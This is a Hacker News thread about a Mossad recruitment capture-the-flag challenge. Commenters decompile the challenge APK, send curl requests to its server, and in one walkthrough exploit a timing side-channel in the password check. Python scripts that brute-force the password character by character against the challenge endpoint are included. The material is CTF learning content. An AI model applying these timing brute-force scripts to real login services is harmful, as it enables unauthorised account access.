
Israeli Mossad launches cyber challenge - stdcall83
http://3d375032374147a7865753e4bbc92682.xyz/
======
atdt
Decompile the apk, and run 'strings' on assets/flutter_assets/kernel_blob.bin.

Poke around and you'll find code for POSTing JSON-encoded credentials to
[http://35.246.158.51:8070/auth/getUrl](http://35.246.158.51:8070/auth/getUrl).
(Grep for the IP to find it.)

So, using the web site name as the seed and the 'client id' as the password,
we get:

$ curl -X POST -H "Content-Type: application/json" -d '{"Seed":
"3d375032374147a7865753e4bbc92682", "Password":
"d7c6bdcfcb184bf587ceee7c7c28e72e"}'
[http://35.246.158.51:8070/auth/getUrl](http://35.246.158.51:8070/auth/getUrl)

The response is an HTTP 200 and: {"AuthURL":"/auth/v2"}

[http://35.246.158.51:8070/auth/v2](http://35.246.158.51:8070/auth/v2) is I
guess the next step.

edit: The /auth/getUrl endpoint responds to any request with the same
response, so that may not be the right Seed/Password combination.

~~~
revocheese
following your steps at getting the strings, which in turn helped me get the
code of the whole application

first of all, as per the code, the User-Agent must be setup to "iWalk-v2"

then doing a simple get request to
[http://35.246.158.51:8070](http://35.246.158.51:8070) will return
{"AuthURL":"/auth/v2"}

replacing the original url with
[http://35.246.158.51:8070/auth/v2](http://35.246.158.51:8070/auth/v2) and
then sending a json like '{"Seed": "3d375032374147a7865753e4bbc92682",
"Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}' with "Content-Type:
application/json" returns {"IsValid":false,"LockURL":"","Time":136764}

the Time here (as per my understanding in the code) is the request duration,
which somehow contradicts postman's request duration field

now one weird thing I've noticed about this app is this, if i install it on a
regular device, and connect that to a proxy, then type gibberish into the
fields then click Login, the following code gets invoked

    
    
      void _submit() async {
        final form = formKey.currentState;
        if (form.validate()) {
          setState(() => _isLoading = true);
          form.save();
          _networkActions.login(_seed, _password)
                          .then((result) => _loginCompleted(result))
                          .catchError((e) { 
                            _loginCompleted(new Token("", false, 0));
                          });
        }
    

if a loading icon appears then I assume that the code passed the condition and
passed this line of code "setState(() => _isLoading = true);" now the weird
part is that, I don't see any outgoing connections from the app... (I use
charles to capture requests)

~~~
andr0id
It's normal that you don't see any traffic using Charles, since Charles can
only intercept traffic made by HttpUrlConnection or OkHttp, since flutter is
not using any of those two..you can't see anything in Charles.

------
chrismeller
Install a random app from Mossad on my phone? N-no, no I don’t think so.

~~~
blattimwind
Challenge is obviously meant to be reversing, not installing.

~~~
mrlatinos
If you deconstruct the APK, you'll find a C script that prints a message -
"You really think it was the Saudis? :)" /s

~~~
rock_artist
So far I've just used those decompile services online and it seems it's
Flutter

package com.iwalk.locksmither;

import android.os.Bundle; import io.flutter.app.FlutterActivity; import
io.flutter.plugins.GeneratedPluginRegistrant;

public class MainActivity extends FlutterActivity { protected void
onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState);
GeneratedPluginRegistrant.registerWith(this); } }

In terms of permissions, it asks for INTERNET.

~~~
1f60c
Here's the VirusTotal page:
[https://www.virustotal.com/#/file/f422d8ceef1a2c3cd6cce10c83...](https://www.virustotal.com/#/file/f422d8ceef1a2c3cd6cce10c834aa7cc994a95a4d695b16bf114e9e8ebb066d7/detection)

------
tdhoot
In case you didn't want to wait for the slow-typing to load the entire
message:

"Welcome Agent.

A team of field operatives is currently on-site in enemy territory, working to
retrieve intel on an imminent terrorist attack.

The intel is contained in a safe, the plans for which are available to
authorized clients via an app [0].

Our client ID is d09ff4ec651c48f89f7f7aa19160bd55

Your mission is to retrieve those plans, and allow our team to break into the
safe.

Good luck!,

    
    
        M."
    

[0]:
[http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk](http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk)

~~~
ChuckNorris89
Are they seriously expecting people to sideload a mossad apk on their phones?

~~~
nickelcitymario
If you're dumb enough to do that... maybe they blacklist you from their
recruitment efforts moving forward.

You could always install it on a virtual phone in a sandboxed VM.

~~~
dclusin
What do you do if they have sandbox escapes you don't know about? The kind of
person that runs it in a VM is someone they'd probably want to be looking at.

Paranoia++ :)

~~~
pmiller2
Download to a burner machine, then airgap it by removing/disabling all
networking hardware, inside a room with no other computers. ;)

~~~
Scoundreller
Then sell the system to an unsuspecting soul on eBay.

~~~
Paraesthetic
Or gumtree

------
jsdev93
THIS IS LEGITIMATE. The Israeli Mossad had a ad today,
[https://www.algemeiner.com/2019/05/09/mossad-marks-
israeli-i...](https://www.algemeiner.com/2019/05/09/mossad-marks-israeli-
independence-day-with-facebook-riddle/) with a picture. The picture has 4 rows
of trophies, which should be converted to 4 numbers using binary --> decimal.
Those four numbers are 35, 246, 158, 51.

As an ip address, 35.246.158.51 leads to the site OP posted.

------
laurentl
The French cyber security community has a similar challenge every year:
[https://www.sstic.org/2019/challenge/](https://www.sstic.org/2019/challenge/)
(in French).

The challenges usually involve static analysis / disassembly, breaking
improperly configured crypto, etc. The best part (for me at least) is that
competitors must submit a write-up of how they cracked the challenge, and the
best write-ups are published. It makes for fascinating reading even if you’re
not really into that scene.

------
andr0id
Searching for "iWalk-v2" on google gives following book as the first result:

[https://books.google.rs/books?id=1nfhpqvLSM4C&pg=PA397&lpg=P...](https://books.google.rs/books?id=1nfhpqvLSM4C&pg=PA397&lpg=PA397&dq=%22iwalk-v2%22&source=bl&ots=oxE7LdoK2w&sig=ACfU3U1h4H0eUFMV2u3zk9VbR_kDiVw_vA&hl=sr&sa=X&ved=2ahUKEwilp4qM94_iAhXIb1AKHXS1CWsQ6AEwBnoECAkQAQ#v=onepage&q=%22iwalk-v2%22&f=false)

on page 397 there is entry in index: iWalk, v2 71 on the same page there are
interesting terms like islamic terrorism, jihad via internet, judism... also
page number 71 which stands next to iWalk term is interesting coincidence
since this riddle is celebrating 71 years of Israel independence...

------
hashberry
This site loads the jQuery library in order to...

1\. Access $("#text1")[0].innerHTML

2\. $( document ).ready() { typeWriter (); }

 _facepalm_

~~~
whoisjuan
It's done like that because the typeWriter effect is actually rendering line
break elements (<br>) as it shows up.

~~~
hashberry
_woosh_ , loading jQuery to access an element is not needed.
document.getElementById would suffice.

~~~
whoisjuan
jQuery is still a valid way to manipulate the DOM. There’s nothing wrong with
doing that, especially if you already need to load jQuery for something else.
I don’t think this is what the comment was referring to.

~~~
hashberry
There's no reason to load a 30KB JavaScript library for such a simple webpage.
See [http://youmightnotneedjquery.com/](http://youmightnotneedjquery.com/)

------
lone_haxx0r
I don't have time for slow-ass typing text. Next.

~~~
mfatica
view page source mr hackerman

~~~
lone_haxx0r
If I need to read the source code of a fucking website for it to be useful,
then it's either a really special edge-case or the designer is a moron. Guess
which case this is.

Why not upload a plain text file in the first place?

~~~
mfatica
because it's a hacking challenge website not a fucking blog. it's supposed to
be thematic

------
salawat
Oh, come on. You have to have an old phone lying around to factory reset for
shits and giggles. Not like they'd burn good zero days on a publicity stunt.

Remember, this thing'll be getting picked apart by everybody considering the
source.

Unless you're afraid of getting black bagged that i...<SIGNAL LOST>

~~~
benburleson
You don't need a 0-day when the target installs for you.

------
qwerty40
Challenge 3: Do we need to RE the EXE cause that’s look obvious but I don’t
think that that’s what we need to do

------
Ritsuko_akagi
I hope my house does receive air strike

~~~
chrischen
I think you mean “doesn’t”. OP is referring to the recent Israeli airstrike of
suspected Hamas hacking group building.

------
jakobov
How do we know this is created by the mossad?

------
Harible
Still stuck at Level 2... Any ideas?

------
alphagrep12345
How do you know it's by mossad?

~~~
Polycryptus
Once you solve the first challenge it tells you to send an email to an @gov.il
email address, which confirms it pretty well for me.

------
Naac
Ignoring the editorialized made up title of this post, is there any
information on who actually made this challenge?

~~~
stdcall83
Saved you the huss of reading hebrew, but actually the challenge starts at:
[https://www.mossad.gov.il/Pages/default.aspx](https://www.mossad.gov.il/Pages/default.aspx)

You need to figure out the address of the site I posted from the picture. (Not
that difficult)

~~~
mrlatinos
Cookies must be enabled... APK to install...

Does curiosity really make ya'll this dumb?

~~~
TheLoneTechNerd
Level 1: The people who just go to the site/download the APK

Level 2: The people who realize that the requested actions are likely unsafe,
and complain about it

Level 3: People who realize that this is part of the challenge and just use a
VM

Nobody on HN is "this dumb", if you want to participate in a challenge with an
_intelligence agency_ , take the proper precautions

~~~
mrlatinos
The majority of the population is Level 1. Consider what that means for
Mossad.

Enjoy your challenge.

~~~
nocturnial
I thought the majority of the population was level 4.

Level 4: Ignore it.

~~~
m3gatr0n
Level 5: You've downloaded Droid4X extra because of it, installed Java and
everything and then you come back on HN to look if somebody is already on the
next challenge (in order to save time) and then you start again, but with the
new challenge :)

------
DvirRonaldo
First Challenge Solution: Mossad 2019 Challenge Start: [https://r-u-
ready-4.it/](https://r-u-ready-4.it/) Every line in the image is binary 8-bit
number that will give you an ip address : 35.246.158.51

Challenge-1 :Link
[http://3d375032374147a7865753e4bbc92682.xyz](http://3d375032374147a7865753e4bbc92682.xyz)
/ [http://35.246.158.51](http://35.246.158.51)

Download app.apk from
[http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk](http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk)
Remember your Client ID - mine is 854279b4c89e4b5c9722352c3f9f1d6c You will
user it as "Seeder" property in the app
////////////////////////////////////////////////////////////////////////////////////////////////
using WireShark (or any other packet snipper) we can see that the login button
does this:

POST /auth/v2 HTTP/1.1si user-agent: iWalk-v2 content-type: application/json;
charset=utf-8 accept-encoding: gzip content-length: 29 host:
35.246.158.51:8070 {"Seed":"admin","Password":"admin "}HTTP/1.1 200 OK
Content-Type: application/json Date: Wed, 08 May 2019 21:49:05 GMT Content-
Length: 47

{"IsValid":false,"LockURL":"","Time":149646302}
///////////////////////////////////////////////////////

Using [http://www.javadecompilers.com/](http://www.javadecompilers.com/), i
Decompiled the apk, and got a lock at the Manifest < <xml version="1.0"
encoding="utf-8" ....... <activity
android:configChanges="density|fontScale|keyboard|keyboardHidden|layoutDirection|locale|orientation|screenLayout|screenSize"
android:hardwareAccelerated="true" android:launchMode="singleTop"
android:name="com.iwalk.locksmither.MainActivity" .... .....

The line "look for us on github.com" got my attention, so i looked for
iwalk.locksmither in github and found "iwalk-locksmithers" linke:
[https://github.com/iwalk-locksmithers-app](https://github.com/iwalk-
locksmithers-app) the server source code was there. In the code, there are a
few comments that can help

[https://github.com/iwalk-locksmithers-
app/server/blob/master...](https://github.com/iwalk-locksmithers-
app/server/blob/master/main.go) link 70 points us to the auth-1 weeknes.

the part of "for currentIndex < len(lock.Password) && currentIndex <
len(loginData.Password) { if lock.Password[currentIndex] !=
loginData.Password[currentIndex] { break } //OG: securing against bruteforce
attempts... ;-) time.Sleep(30 * time.Millisecond) currentIndex++ }"

the securing aginst bruteforce (tyring all combinations) is the weeknes. The
idea behind for hacking the password is to try only one char at first. if we
get a 30ms dealy, it means we got the 1st char right, so then we can check the
next one, so we will try 2 chars (the 1st we know, the second we will guess)
if we will get 60 ms +- dealy then we got th 2nd char and we will try the
third one, and again and again, until we will get the password.

To solve it, it wrote a simple c# code that does in a loop http push to the
server every time we try to add a new char to the password, and if we got a
dealy that is +- 30ms more then the last try, we add that char our final
password the uri is
[http://35.246.158.51:8070/auth/v1_1](http://35.246.158.51:8070/auth/v1_1) and
user agent is ed9ae2c0-9b15-4556-a393-23d500675d4b (as writen in the server) I
did some avg calcs of the dealys The password length is 32 with hexa char
(didnt know that until i guessed the password) we can know that the password
is correct when we get back "IsValid":true" *Time we get is in nano Seconds
and not ms

After I enterd the pasword and cliend id, i got a link for a token and a linke
for challenge 2

[http://759d8eba52184f538c8a4525680cfb33.xyz/](http://759d8eba52184f538c8a4525680cfb33.xyz/)

Challenge-2
[http://759d8eba52184f538c8a4525680cfb33.xyz/](http://759d8eba52184f538c8a4525680cfb33.xyz/)

~~~
rootux
Not sure I understand the bruthforce code. I'm trying to get the first char.
I've written something along

import requests

import string

#a-zA-Z!@#$%^&*()_-=

printables_chars = string.printable

agent = 'ed9ae2c0-9b15-4556-a393-23d500675d4b'

for i, char in enumerate(printables_chars):

    
    
        print('run {}. char {}'.format(i,char))
    
        result = requests.post('http://35.246.158.51:8070/auth/v1_1',
                      data={"Seed": "d14236b60e0f4aef94499cb648a5f522", "Password": char})
    
        if(result.json()['Time'] > 100000000):
    
            # This prints randomly for some cases and others doesn't
    
            print(result.json()['Time'])

~~~
adv-it
On Python I used this:

CHARACTERS =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=[]{}|\/?,.<>`~"

URL =
"[http://35.246.158.51:8070/auth/v1_1"](http://35.246.158.51:8070/auth/v1_1")

HEADERS = {'User-Agent' : 'ed9ae2c0-9b15-4556-a393-23d500675d4b', 'content-
type' : 'application/json; charset=utf-8' }

PAYLOAD ={}

for i in range(len(CHARACTERS)):

    
    
        PAYLOAD['Seed']     = "6711d2ec0d724396ad1570fcfb431443"
    
        PAYLOAD['Password'] = "" + CHARACTERS[i]
    
        r = requests.post(url=URL, json=PAYLOAD, headers=HEADERS)
    
        result = r.json()
    
        delay = result['Time']
    
        print(str(PAYLOAD) + " - " + str(delay))
    
    

But for first character I don't see really huge DELAY response, always I have
few characters with big delay and not only one.

~~~
Gra8888
I think u can remove Big letters and characters need only abc...1234 numb it's
faster. Incredible code.

------
zuburking
is challenge 2 download cert page down?

------
yanirta
Challenge #2, someone forgot a reference to
[https://dev.missilesys.com/](https://dev.missilesys.com/) ;)

